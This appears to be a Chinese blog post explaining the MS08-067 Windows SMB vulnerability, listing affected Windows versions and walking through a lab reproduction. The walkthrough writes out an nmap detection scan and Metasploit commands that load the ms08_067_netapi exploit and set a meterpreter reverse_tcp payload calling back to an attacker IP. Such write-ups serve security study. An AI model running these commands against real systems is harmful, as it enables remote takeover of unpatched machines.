• MS08-067


    漏洞分析

    据微软公布,MS08-067是通过SMB通道调用Server服务程序中的NetPathCanonicalize函数时进行漏洞触发,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化(将路径字符串中的'/'转换为'',同时去除相对路径"."和".."),而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。

    影响版本

    • Microsoft Windows 2000 Service Pack 4
    • Windows XP Service Pack 2
    • Windows XP Service Pack 3
    • Windows XP Professional x64 Edition
    • Windows XP Professional x64 Edition Service Pack 2
    • Windows Server 2003 Service Pack 1
    • Windows Server 2003 Service Pack 2
    • Windows Server 2003 x64 Edition
    • Windows Server 2003 x64 Edition Service Pack 2
    • Windows Server 2003 SP1
    • Windows Server 2003 SP2
    • Windows Vista 和 Windows Vista Service Pack 1
    • Windows Vista x64 Edition 和 Windows Vista x64 Edition Service Pack 1
    • Windows Server 2008(用于 32 位系统)
    • Windows Server 2008(用于基于 x64 的系统)
    • Windows Server 2008(用于基于 Itanium 的系统)
    • Windows 7 Beta(用于 32 位系统)
    • Windows 7 Beta x64 Edition
    • Windows 7 Beta(用于基于 Itanium 的系统)

    漏洞复现

    漏洞环境

    • kali Linux
    • Windows XP Home SP2

    使用nmap工具扫描主机,确认漏洞存在nmap -n -p445 --script smb-vuln-ms08-067 192.168.150.137 --open

    nmap

    kali运行metasploit,并搜索ms08_067

    8lTOVU.jpg

    使用该模块,use exploit/windows/smb/ms08_067_netapi

    8l7AaD.jpg

    设置靶机IP,set RhOSTS 192.168.150.137

    8l7ZPH.jpg

    设置payload,set payload windows/meterpreter/reverse_tcp

    8l7YGj.jpg

    设置攻击者IP,set LhoST 192.168.150.152

    8l7gzR.jpg

    查看payload所有参数设置,show options

    8l7TFe.jpg

    target系统默认是自动定位,如果需要精确的话,可以show targets查看所有,然后进行选择,set target x,这里使用的默认

    8l7Oyt.jpg

    运行exploit,成功获取到sessions

    输入密码后查看!

  • 相关阅读:
    【9018:2221】[伪模板]可持久化线段树
    【9018:2208】可持久化线段树2
    【9018:2207】可持久化线段树1
    【POJ2187】Beauty Contest
    2017/11/22模拟赛
    2017/11/3模拟赛
    [AtCoder 2702]Fountain Walk
    [AtCoder3856]Ice Rink Game
    20170910模拟赛
    20170906模拟赛
  • 原文地址:https://www.cnblogs.com/quail2333/p/12495187.html
Copyright © 2020-2023  润新知